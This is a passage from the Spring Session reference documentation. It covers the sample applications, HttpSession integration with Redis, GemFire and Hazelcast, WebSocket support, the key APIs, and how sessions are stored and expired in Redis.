discussing Spring Session\n\n[[samples]]\n== Samples and Guides (Start Here)\n\nIf you are looking to get started with Spring Session, the best place to start is our Sample Applications.\n\n.Sample Applications\n|===\n| Source | Description | Guide\n\n| {gh-samples-url}httpsession[HttpSession]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store.\n| link:guides\/httpsession.html[HttpSession Guide]\n\n| {gh-samples-url}httpsession-xml[HttpSession XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with a Redis store using XML based configuration.\n| link:guides\/httpsession-xml.html[HttpSession XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver[HttpSession with GemFire (Client\/Server)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology.\n| 
link:guides\/httpsession-gemfire-clientserver.html[HttpSession GemFire Client\/Server Guide]\n\n| {gh-samples-url}httpsession-gemfire-clientserver-xml[HttpSession with GemFire (Client\/Server) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a Client\/Server topology configured with XML.\n| link:guides\/httpsession-gemfire-clientserver-xml.html[HttpSession GemFire Client\/Server XML Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p[HttpSession with GemFire (P2P)]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology.\n| link:guides\/httpsession-gemfire-p2p.html[HttpSession GemFire P2P Guide]\n\n| {gh-samples-url}httpsession-gemfire-p2p-xml[HttpSession with GemFire (P2P) using XML]\n| Demonstrates how to use Spring Session to replace the `HttpSession` with GemFire using a P2P topology configured with XML.\n| link:guides\/httpsession-gemfire-p2p-xml.html[HttpSession GemFire P2P XML Guide]\n\n| {gh-samples-url}custom-cookie[Custom Cookie]\n| Demonstrates how to use Spring Session and customize the cookie.\n| link:guides\/custom-cookie.html[Custom Cookie Guide]\n\n| {gh-samples-url}boot[Spring Boot]\n| Demonstrates how to use Spring Session with Spring Boot.\n| link:guides\/boot.html[Spring Boot Guide]\n\n| {gh-samples-url}security[Spring Security]\n| Demonstrates how to use Spring Session with an existing Spring Security application.\n| link:guides\/security.html[Spring Security Guide]\n\n| {gh-samples-url}rest[REST]\n| Demonstrates how to use Spring Session in a REST application to support authenticating with a header.\n| link:guides\/rest.html[REST Guide]\n\n| {gh-samples-url}findbyusername[Find by Username]\n| Demonstrates how to use Spring Session to find sessions by username.\n| link:guides\/findbyusername.html[Find by Username]\n\n| {gh-samples-url}users[Multiple Users]\n| Demonstrates how to use Spring Session to manage multiple simultaneous browser sessions (i.e Google Accounts).\n| link:guides\/users.html[Manage Multiple Users Guide]\n\n| {gh-samples-url}websocket[WebSocket]\n| Demonstrates how to use Spring Session with WebSockets.\n| link:guides\/websocket.html[WebSocket Guide]\n\n[[samples-hazelcast]]\n| {gh-samples-url}hazelcast[Hazelcast]\n| Demonstrates how to use Spring Session with Hazelcast.\n| TBD\n\n[[samples-hazelcast-spring]]\n| {gh-samples-url}hazelcast-spring[Hazelcast Spring]\n| Demonstrates how to use Spring Session and Hazelcast with an existing Spring Security application.\n| link:guides\/hazelcast-spring.html[Hazelcast Spring Guide]\n\n|===\n\n[[httpsession]]\n== HttpSession Integration\n\nSpring Session provides transparent integration with `HttpSession`.\nThis means that developers can switch the `HttpSession` implementation out with an implementation that is backed by Spring Session.\n\n[[httpsession-why]]\n=== Why Spring Session & HttpSession?\n\nWe have already mentioned that Spring Session provides transparent integration with `HttpSession`, but what benefits do we get out of this?\n\n* **Clustered Sessions** - Spring Session makes it trivial to support <<httpsession-redis,clustered sessions>> without being tied to an application container specific solution.\n* **Multiple Browser Sessions** - Spring Session supports <<httpsession-multi,managing multiple users' sessions>> in a single browser instance (i.e. 
multiple authenticated accounts similar to Google).\n* **RESTful APIs** - Spring Session allows providing session ids in headers to work with <<httpsession-rest,RESTful APIs>>\n\n[[httpsession-redis]]\n=== HttpSession with Redis\n\nUsing Spring Session with `HttpSession` is enabled by adding a Servlet Filter before anything that uses the `HttpSession`.\nYou can choose from enabling this using either:\n\n* <<httpsession-redis-jc,Java Based Configuration>>\n* <<httpsession-redis-xml,XML Based Configuration>>\n\n[[httpsession-redis-jc]]\n==== Redis Java Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using Java based configuration.\n\nNOTE: The <<samples, HttpSession Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession Guide when integrating with your own application.\n\ninclude::guides\/httpsession.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-redis-xml]]\n==== Redis XML Based Configuration\n\nThis section describes how to use Redis to back `HttpSession` using XML based configuration.\n\nNOTE: The <<samples, HttpSession XML Sample>> provides a working sample on how to integrate Spring Session and `HttpSession` using XML configuration.\nYou can read the basic steps for integration below, but you are encouraged to follow along with the detailed HttpSession XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire]]\n=== HttpSession with Pivotal GemFire\n\nWhen https:\/\/pivotal.io\/big-data\/pivotal-gemfire[Pivotal GemFire] is used with Spring Session, a web application's\n`HttpSession` can be replaced with a **clustered** implementation managed by GemFire and conveniently accessed\nwith Spring Session's API.\n\nThe two most common topologies to manage Spring Sessions using GemFire include:\n\n* <<httpsession-gemfire-clientserver,Client-Server>>\n* <<httpsession-gemfire-p2p,Peer-To-Peer (P2P)>>\n\nAdditionally, GemFire supports site-to-site replication using http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/topologies_and_comm\/multi_site_configuration\/chapter_overview.html[WAN functionality].\nThe ability to configure and use GemFire's WAN support is independent of Spring Session, and is beyond the scope\nof this document. More details on GemFire WAN functionality can be found http:\/\/docs.spring.io\/spring-data-gemfire\/docs\/current\/reference\/html\/#bootstrap:gateway[here].\n\n[[httpsession-gemfire-clientserver]]\n==== GemFire Client-Server\n\nThe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/cs_configuration\/chapter_overview.html[Client-Server]\ntopology will probably be the more common configuration preference for users when using GemFire as a provider in\nSpring Session since a GemFire server will have significantly different and unique JVM heap requirements when compared\nto the application. Using a client-server topology enables an application to manage (e.g. 
replicate) application state\nindependently from other application processes.\n\nIn a client-server topology, an application using Spring Session will open a client cache connection to a (remote)\nGemFire server cluster to manage and provide consistent access to all `HttpSession` state.\n\nYou can configure a Client-Server topology with either:\n\n* <<httpsession-gemfire-clientserver-java,Java-based Configuration>>\n* <<httpsession-gemfire-clientserver-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-clientserver-java]]\n===== GemFire Client-Server Java-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with Java-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the HttpSession using Java configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver.adoc[tags=config,leveloffset=+3]\n\n[[http-session-gemfire-clientserver-xml]]\n===== GemFire Client-Server XML-based Configuration\n\nThis section describes how to use GemFire's Client-Server topology to back an `HttpSession` with XML-based configuration.\n\nNOTE: The <<samples,HttpSession with GemFire (Client-Server) using XML Sample>> provides a working sample on how to\nintegrate Spring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (Client-Server)\nusing XML Guide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-clientserver-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p]]\n==== GemFire Peer-To-Peer (P2P)\n\nPerhaps less common would be to configure the Spring Session application as a peer member in the GemFire cluster using\nthe http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/topologies_and_comm\/p2p_configuration\/chapter_overview.html[Peer-To-Peer (P2P)] topology.\nIn this configuration, a Spring Session application would be an actual data node (server) in the GemFire cluster,\nand **not** a cache client as before.\n\nOne advantage to this approach is the proximity of the application to the application's state (i.e. it's data). 
However,\nthere are other effective means of accomplishing similar data dependent computations, such as using GemFire's\nhttp:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/developing\/function_exec\/chapter_overview.html[Function Execution].\nAny of GemFire's other http:\/\/gemfire.docs.pivotal.io\/docs-gemfire\/latest\/getting_started\/product_intro.html[features]\ncan be used when GemFire is serving as a provider in Spring Session.\n\nP2P is very useful for both testing purposes as well as smaller, more focused and self-contained applications,\nsuch as those found in a microservices architecture, and will most certainly improve on your application's latency,\nthroughput and consistency needs.\n\nYou can configure a Peer-To-Peer (P2P) topology with either:\n\n* <<httpsession-gemfire-p2p-java,Java-based Configuration>>\n* <<httpsession-gemfire-p2p-xml,XML-based Configuration>>\n\n[[httpsession-gemfire-p2p-java]]\n===== GemFire Peer-To-Peer (P2P) Java-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using Java-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using Java configuration. You can read the basic steps\nfor integration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) Guide\nwhen integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-gemfire-p2p-xml]]\n===== GemFire Peer-To-Peer (P2P) XML-based Configuration\n\nThis section describes how to use GemFire's Peer-To-Peer (P2P) topology to back an `HttpSession` using XML-based configuration.\n\nNOTE: The <<samples, HttpSession with GemFire (P2P) using XML Sample>> provides a working sample on how to integrate\nSpring Session and GemFire to replace the `HttpSession` using XML configuration. You can read the basic steps for\nintegration below, but you are encouraged to follow along with the detailed HttpSession with GemFire (P2P) using XML\nGuide when integrating with your own application.\n\ninclude::guides\/httpsession-gemfire-p2p-xml.adoc[tags=config,leveloffset=+3]\n\n[[httpsession-how]]\n=== How HttpSession Integration Works\n\nFortunately both `HttpSession` and `HttpServletRequest` (the API for obtaining an `HttpSession`) are both interfaces.\nThis means that we can provide our own implementations for each of these APIs.\n\nNOTE: This section describes how Spring Session provides transparent integration with `HttpSession`. The intent is so that user's can understand what is happening under the covers. This functionality is already integrated and you do NOT need to implement this logic yourself.\n\nFirst we create a custom `HttpServletRequest` that returns a custom implementation of `HttpSession`.\nIt looks something like the following:\n\n[source, java]\n----\npublic class SessionRepositoryRequestWrapper extends HttpServletRequestWrapper {\n\n\tpublic SessionRepositoryRequestWrapper(HttpServletRequest original) {\n\t\tsuper(original);\n\t}\n\n\tpublic HttpSession getSession() {\n\t\treturn getSession(true);\n\t}\n\n\tpublic HttpSession getSession(boolean createNew) {\n\t\t\/\/ create an HttpSession implementation from Spring Session\n\t}\n\n\t\/\/ ... 
other methods delegate to the original HttpServletRequest ...\n}\n----\n\nAny method that returns an `HttpSession` is overridden.\nAll other methods are implemented by `HttpServletRequestWrapper` and simply delegate to the original `HttpServletRequest` implementation.\n\nWe replace the `HttpServletRequest` implementation using a servlet `Filter` called `SessionRepositoryFilter`.\nThe pseudocode can be found below:\n\n[source, java]\n----\npublic class SessionRepositoryFilter implements Filter {\n\n\tpublic doFilter(ServletRequest request, ServletResponse response, FilterChain chain) {\n\t\tHttpServletRequest httpRequest = (HttpServletRequest) request;\n\t\tSessionRepositoryRequestWrapper customRequest =\n\t\t\tnew SessionRepositoryRequestWrapper(httpRequest);\n\n\t\tchain.doFilter(customRequest, response, chain);\n\t}\n\n\t\/\/ ...\n}\n----\n\nBy passing in a custom `HttpServletRequest` implementation into the `FilterChain` we ensure that anything invoked after our `Filter` uses the custom `HttpSession` implementation.\nThis highlights why it is important that Spring Session's `SessionRepositoryFilter` must be placed before anything that interacts with the `HttpSession`.\n\n[[httpsession-multi]]\n=== Multiple HttpSessions in Single Browser\n\nSpring Session has the ability to support multiple sessions in a single browser instance.\nThis provides the ability to support authenticating with multiple users in the same browser instance (i.e. Google Accounts).\n\nNOTE: The <<samples,Manage Multiple Users Guide>> provides a complete working example of managing multiple users in the same browser instance.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed Manage Multiple Users Guide when integrating with your own application.\n\ninclude::guides\/users.adoc[tags=how-does-it-work,leveloffset=+1]\n\n[[httpsession-rest]]\n=== HttpSession & RESTful APIs\n\nSpring Session can work with RESTful APIs by allowing the session to be provided in a header.\n\n\nNOTE: The <<samples, REST Sample>> provides a working sample on how to use Spring Session in a REST application to support authenticating with a header.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed REST Guide when integrating with your own application.\n\ninclude::guides\/rest.adoc[tags=config,leveloffset=+2]\n\n[[httpsession-httpsessionlistener]]\n=== HttpSessionListener\n\nSpring Session supports `HttpSessionListener` by translating `SessionDestroyedEvent` and `SessionCreatedEvent` into `HttpSessionEvent` by declaring `SessionEventHttpSessionListenerAdapter`.\nTo use this support, you need to:\n\n* Ensure your `SessionRepository` implementation supports and is configured to fire `SessionDestroyedEvent` and `SessionCreatedEvent`.\n* Configure `SessionEventHttpSessionListenerAdapter` as a Spring bean.\n* Inject every `HttpSessionListener` into the `SessionEventHttpSessionListenerAdapter`\n\nIf you are using the configuration support documented in <<httpsession-redis,HttpSession with Redis>>, then all you need to do is register every `HttpSessionListener` as a bean.\nFor example, assume you want to support Spring Security's concurrency control and need to use `HttpSessionEventPublisher` you can simply add `HttpSessionEventPublisher` as a bean.\nIn Java configuration, this might look like:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/RedisHttpSessionConfig.java[tags=config]\n----\n\nIn XML configuration, 
this might look like:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/http\/HttpSessionListenerXmlTests-context.xml[tags=config]\n----\n\n[[websocket]]\n== WebSocket Integration\n\nSpring Session provides transparent integration with Spring's WebSocket support.\n\ninclude::guides\/websocket.adoc[tags=disclaimer,leveloffset=+1]\n\n[[websocket-why]]\n=== Why Spring Session & WebSockets?\n\nSo why do we need Spring Session when using WebSockets?\n\nConsider an email application that does much of its work through HTTP requests.\nHowever, there is also a chat application embedded within it that works over WebSocket APIs.\nIf a user is actively chatting with someone, we should not timeout the `HttpSession` since this would be pretty poor user experience.\nHowever, this is exactly what https:\/\/java.net\/jira\/browse\/WEBSOCKET_SPEC-175[JSR-356] does.\n\nAnother issue is that according to JSR-356 if the `HttpSession` times out any WebSocket that was created with that HttpSession and an authenticated user should be forcibly closed.\nThis means that if we are actively chatting in our application and are not using the HttpSession, then we will also disconnect from our conversation!\n\n[[websocket-usage]]\n=== WebSocket Usage\n\nThe <<samples, WebSocket Sample>> provides a working sample on how to integrate Spring Session with WebSockets.\nYou can follow the basic steps for integration below, but you are encouraged to follow along with the detailed WebSocket Guide when integrating with your own application:\n\n[[websocket-httpsession]]\n==== HttpSession Integration\n\nBefore using WebSocket integration, you should be sure that you have <<httpsession>> working first.\n\ninclude::guides\/websocket.adoc[tags=config,leveloffset=+2]\n\n[[api]]\n== API Documentation\n\nYou can browse the complete link:..\/..\/api\/[Javadoc] online. The key APIs are described below:\n\n[[api-session]]\n=== Session\n\nA `Session` is a simplified `Map` of name value pairs.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `Session`. The generic type is defined in our class.\n<2> We create a new `Session` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `Session`. In our example, we demonstrate saving a `User` to the `Session`.\n<4> We now save the `Session`. This is why we needed the generic type `S`. The `SessionRepository` only allows saving `Session` instances that were created or retrieved using the same `SessionRepository`. This allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\n<5> We retrieve the `Session` from the `SessionRepository`.\n<6> We obtain the persisted `User` from our `Session` without the need for explicitly casting our attribute.\n\n[[api-expiringsession]]\n=== ExpiringSession\n\nAn `ExpiringSession` extends a `Session` by providing attributes related to the `Session` instance's expiration.\nIf there is no need to interact with the expiration information, prefer using the more simple `Session` API.\n\nTypical usage might look like the following:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=expire-repository-demo]\n----\n\n<1> We create a `SessionRepository` instance with a generic type, `S`, that extends `ExpiringSession`. 
The generic type is defined in our class.\n<2> We create a new `ExpiringSession` using our `SessionRepository` and assign it to a variable of type `S`.\n<3> We interact with the `ExpiringSession`.\nIn our example, we demonstrate updating the amount of time the `ExpiringSession` can be inactive before it expires.\n<4> We now save the `ExpiringSession`.\nThis is why we needed the generic type `S`.\nThe `SessionRepository` only allows saving `ExpiringSession` instances that were created or retrieved using the same `SessionRepository`.\nThis allows for the `SessionRepository` to make implementation specific optimizations (i.e. only writing attributes that have changed).\nThe last accessed time is automatically updated when the `ExpiringSession` is saved.\n<5> We retrieve the `ExpiringSession` from the `SessionRepository`.\nIf the `ExpiringSession` were expired, the result would be null.\n\n[[api-sessionrepository]]\n=== SessionRepository\n\nA `SessionRepository` is in charge of creating, retrieving, and persisting `Session` instances.\n\nIf possible, developers should not interact directly with a `SessionRepository` or a `Session`.\nInstead, developers should prefer interacting with `SessionRepository` and `Session` indirectly through the <<httpsession,HttpSession>> and <<websocket,WebSocket>> integration.\n\n[[api-findbyindexnamesessionrepository]]\n=== FindByIndexNameSessionRepository\n\nSpring Session's most basic API for using a `Session` is the `SessionRepository`.\nThis API is intentionally very simple, so that it is easy to provide additional implementations with basic functionality.\n\nSome `SessionRepository` implementations may choose to implement `FindByIndexNameSessionRepository` also.\nFor example, Spring's Redis support implements `FindByIndexNameSessionRepository`.\n\nThe `FindByIndexNameSessionRepository` adds a single method to look up all the sessions for a particular user.\nThis is done by ensuring that the session attribute with the name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME` is populated with the username.\nIt is the responsibility of the developer to ensure the attribute is populated since Spring Session is not aware of the authentication mechanism being used.\nAn example of how this might be used can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=set-username]\n----\n\n[NOTE]\n====\nSome implementations of `FindByIndexNameSessionRepository` will provide hooks to automatically index other session attributes.\nFor example, many implementations will automatically ensure the current Spring Security user name is indexed with the index name `FindByIndexNameSessionRepository.PRINCIPAL_NAME_INDEX_NAME`.\n====\n\nOnce the session is indexed, it can be found using the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/FindByIndexNameSessionRepositoryTests.java[tags=findby-username]\n----\n\n[[api-enablespringhttpsession]]\n=== EnableSpringHttpSession\n\nThe `@EnableSpringHttpSession` annotation can be added to an `@Configuration` class to expose the `SessionRepositoryFilter` as a bean named \"springSessionRepositoryFilter\".\nIn order to leverage the annotation, a single `SessionRepository` bean must be provided.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/SpringHttpSessionConfig.java[tags=class]\n----\n\nIt is important to note that no infrastructure for session expirations is configured for you out of the box.\nThis is 
because things like session expiration are highly implementation dependent.\nThis means if you require cleaning up expired sessions, you are responsible for cleaning up the expired sessions.\n\n[[api-enablehazelcasthttpsession]]\n=== EnableHazelcastHttpSession\n\nIf you wish to use http:\/\/hazelcast.org\/[Hazelcast] as your backing source for the `SessionRepository`, then the `@EnableHazelcastHttpSession` annotation\ncan be added to an `@Configuration` class. This extends the functionality provided by the `@EnableSpringHttpSession` annotation but makes the `SessionRepository` for you in Hazelcast.\nYou must provide a single `HazelcastInstance` bean for the configuration to work.\nFor example:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/http\/HazelcastHttpSessionConfig.java[tags=config]\n----\n\nThis will configure Hazelcast in embedded mode with default configuration.\nSee the http:\/\/docs.hazelcast.org\/docs\/latest\/manual\/html-single\/index.html#hazelcast-configuration[Hazelcast documentation] for\ndetailed information on configuration options for Hazelcast.\n\n[[api-enablehazelcasthttpsession-storage]]\n==== Storage Details\n\nSessions will be stored in a distributed `Map` in Hazelcast using a <<api-mapsessionrepository,MapSessionRepository>>.\nThe `Map` interface methods will be used to `get()` and `put()` Sessions.\nThe expiration of a session in the `Map` is handled by Hazelcast's support for setting the time to live on an entry when it is `put()` into the `Map`. Entries (sessions) that have been idle longer than the time to live will be automatically removed from the `Map`.\n\nYou shouldn't need to configure any settings such as `max-idle-seconds` or `time-to-live-seconds` for the `Map` within the Hazelcast configuration.\n\n[[api-enablehazelcasthttpsession-customize]]\n==== Basic Customization\nYou can use the following attributes on `@EnableHazelcastHttpSession` to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds. 
Default is 1800 seconds (30 minutes)\n* **sessionMapName** - the name of the distributed `Map` that will be used in Hazelcast to store the session data.\n\n[[api-enablehazelcasthttpsession-events]]\n==== Session Events\nUsing a `MapListener` to respond to entries being added, evicted, and removed from the distributed `Map`, these events will trigger\npublishing SessionCreatedEvent, SessionExpiredEvent, and SessionDeletedEvent events respectively using the `ApplicationEventPublisher`.\n\n[[api-redisoperationssessionrepository]]\n=== RedisOperationsSessionRepository\n\n`RedisOperationsSessionRepository` is a `SessionRepository` that is implemented using Spring Data's `RedisOperations`.\nIn a web environment, this is typically used in combination with `SessionRepositoryFilter`.\nThe implementation supports `SessionDestroyedEvent` and `SessionCreatedEvent` through `SessionMessageListener`.\n\n[[api-redisoperationssessionrepository-new]]\n==== Instantiating a RedisOperationsSessionRepository\n\nA typical example of how to create a new instance can be seen below:\n\n[source,java,indent=0]\n----\ninclude::{indexdoc-tests}[tags=new-redisoperationssessionrepository]\n----\n\nFor additional information on how to create a `RedisConnectionFactory`, refer to the Spring Data Redis Reference.\n\n[[api-redisoperationssessionrepository-config]]\n==== EnableRedisHttpSession\n\nIn a web environment, the simplest way to create a new `RedisOperationsSessionRepository` is to use `@EnableRedisHttpSession`.\nComplete example usage can be found in the <<samples>>\nYou can use the following attributes to customize the configuration:\n\n* **maxInactiveIntervalInSeconds** - the amount of time before the session will expire in seconds\n* **redisNamespace** - allows configuring an application specific namespace for the sessions. Redis keys and channel ids will start with the prefix of `spring:session:<redisNamespace>:`.\n* **redisFlushMode** - allows specifying when data will be written to Redis. 
The default is only when `save` is invoked on `SessionRepository`.\nA value of `RedisFlushMode.IMMEDIATE` will write to Redis as soon as possible.\n\n===== Custom RedisSerializer\n\nYou can customize the serialization by creating a Bean named `springSessionDefaultRedisSerializer` that implements `RedisSerializer<Object>`.\n\n==== Redis TaskExecutor\n\n`RedisOperationsSessionRepository` is subscribed to receive events from Redis using a `RedisMessageListenerContainer`.\nYou can customize the way those events are dispatched by creating a Bean named `springSessionRedisTaskExecutor` and\/or a Bean named `springSessionRedisSubscriptionExecutor`.\nMore details on configuring Redis task executors can be found http:\/\/docs.spring.io\/spring-data-redis\/docs\/current\/reference\/html\/#redis:pubsub:subscribe:containers[here].\n\n[[api-redisoperationssessionrepository-storage]]\n==== Storage Details\n\nThe sections below outline how Redis is updated for each operation.\nAn example of creating a new session can be found below.\nThe subsequent sections describe the details.\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr:attrName2 someAttrValue2\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations:1439245080000 2100\n----\n\n===== Saving a Session\n\nEach session is stored in Redis as a Hash.\nEach session is set and updated using the HMSET command.\nAn example of how each session is stored can be seen below.\n\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe creationTime 1404360000000 \\\n\tmaxInactiveInterval 1800 \\\n\tlastAccessedTime 1404360000000 \\\n\tsessionAttr:attrName someAttrValue \\\n\tsessionAttr:attrName2 someAttrValue2\n----\n\nIn this example, the following statements are true about the session:\n\n* The session id is 33fdd1b6-b496-4b33-9f7d-df96679d32fe.\n* The session was created at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session expires in 1800 seconds (30 minutes).\n* The session was last accessed at 1404360000000 in milliseconds since midnight of 1\/1\/1970 GMT.\n* The session has two attributes.\nThe first is \"attrName\" with the value of \"someAttrValue\".\nThe second session attribute is named \"attrName2\" with the value of \"someAttrValue2\".\n\n[[api-redisoperationssessionrepository-writes]]\n===== Optimized Writes\n\nThe `Session` instances managed by `RedisOperationsSessionRepository` keep track of the properties that have changed and only update those.\nThis means that if an attribute is written once and read many times, we only need to write that attribute once.\nFor example, assume the session attribute \"sessionAttr2\" from earlier was updated.\nThe following would be executed upon saving:\n\n----\nHMSET spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe sessionAttr:attrName2 newValue\n----\n\n[[api-redisoperationssessionrepository-expiration]]\n===== Session Expiration\n\nAn expiration is associated with each session using the EXPIRE command, based upon `ExpiringSession.getMaxInactiveInterval()`.\nFor 
example:\n\n----\nEXPIRE spring:session:sessions:33fdd1b6-b496-4b33-9f7d-df96679d32fe 2100\n----\n\nYou will note that the expiration that is set is 5 minutes after the session actually expires.\nThis is necessary so that the value of the session can be accessed when the session expires.\nSetting the expiration on the session itself five minutes after it actually expires ensures it is cleaned up, but only after we have performed any necessary processing.\n\n[NOTE]\n====\nThe `SessionRepository.getSession(String)` method ensures that no expired sessions will be returned.\nThis means there is no need to check the expiration before using a session.\n====\n\nSpring Session relies on the delete and expired http:\/\/redis.io\/topics\/notifications[keyspace notifications] from Redis to fire a <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionDeletedEvent>> and <<api-redisoperationssessionrepository-sessiondestroyedevent,SessionExpiredEvent>> respectively.\nIt is the `SessionDeletedEvent` or `SessionExpiredEvent` that ensures resources associated with the Session are cleaned up.\nFor example, when using Spring Session's WebSocket support, the Redis expired or delete event is what triggers any WebSocket connections associated with the session to be closed.\n\nExpiration is not tracked directly on the session key itself, since this would mean the session data would no longer be available. Instead, a special session expires key is used. In our example, the expires key is:\n\n----\nAPPEND spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe \"\"\nEXPIRE spring:session:sessions:expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe 1800\n----\n\nWhen a session expires key is deleted or expires, the keyspace notification triggers a lookup of the actual session and a `SessionDestroyedEvent` is fired.\n\nOne problem with relying on Redis expiration exclusively is that Redis makes no guarantee of when the expired event will be fired if the key has not been accessed.\nSpecifically, the background task that Redis uses to clean up expired keys is a low-priority task and may not trigger the key expiration.\nFor additional details, see the http:\/\/redis.io\/topics\/notifications[Timing of expired events] section in the Redis documentation.\n\nTo circumvent the fact that expired events are not guaranteed to happen, we can ensure that each key is accessed when it is expected to expire.\nThis means that if the TTL is expired on the key, Redis will remove the key and fire the expired event when we try to access the key.\n\nFor this reason, each session expiration is also tracked to the nearest minute.\nThis allows a background task to access the potentially expired sessions to ensure that Redis expired events are fired in a more deterministic fashion.\nFor example:\n\n----\nSADD spring:session:expirations:1439245080000 expires:33fdd1b6-b496-4b33-9f7d-df96679d32fe\nEXPIRE spring:session:expirations:1439245080000 2100\n----\n\nThe background task will then use these mappings to explicitly request each key.\nBy accessing the key, rather than deleting it, we ensure that Redis deletes the key for us only if the TTL is expired.\n\n[NOTE]\n====\nWe do not explicitly delete the keys since in some instances there may be a race condition that incorrectly identifies a key as expired when it is not.\nShort of using distributed locks (which would kill our performance) there is no way to ensure the consistency of the expiration mapping.\nBy simply accessing the key, we ensure that the key is only removed if the TTL on 
that key is expired.\n====\n\n\n[[api-redisoperationssessionrepository-sessiondestroyedevent]]\n==== SessionDeletedEvent and SessionExpiredEvent\n\n`SessionDeletedEvent` and `SessionExpiredEvent` are both types of `SessionDestroyedEvent`.\n\n`RedisOperationsSessionRepository` supports firing a `SessionDeletedEvent` whenever a `Session` is deleted or a `SessionExpiredEvent` when it expires.\nThis is necessary to ensure resources associated with the `Session` are properly cleaned up.\n\nFor example, when integrating with WebSockets, the `SessionDestroyedEvent` is in charge of closing any active WebSocket connections.\n\nFiring `SessionDeletedEvent` or `SessionExpiredEvent` is made available through the `SessionMessageListener`, which listens to http:\/\/redis.io\/topics\/notifications[Redis Keyspace events].\nIn order for this to work, Redis Keyspace events for Generic commands and Expired events need to be enabled.\nFor example:\n\n[source,bash]\n----\nredis-cli config set notify-keyspace-events Egx\n----\n\nIf you are using `@EnableRedisHttpSession`, registering the `SessionMessageListener` and enabling the necessary Redis Keyspace events is done automatically.\nHowever, in a secured Redis environment the config command is disabled.\nThis means that Spring Session cannot configure Redis Keyspace events for you.\nTo disable the automatic configuration, add `ConfigureRedisAction.NO_OP` as a bean.\n\nFor example, Java Configuration can use the following:\n\n[source,java,indent=0]\n----\ninclude::{docs-test-dir}docs\/RedisHttpSessionConfigurationNoOpConfigureRedisActionTests.java[tags=configure-redis-action]\n----\n\nXML Configuration can use the following:\n\n[source,xml,indent=0]\n----\ninclude::{docs-test-resources-dir}docs\/HttpSessionConfigurationNoOpConfigureRedisActionXmlTests-context.xml[tags=configure-redis-action]\n----\n\n[[api-redisoperationssessionrepository-sessioncreatedevent]]\n==== SessionCreatedEvent\n\nWhen a session is created, an event is sent to Redis on the channel 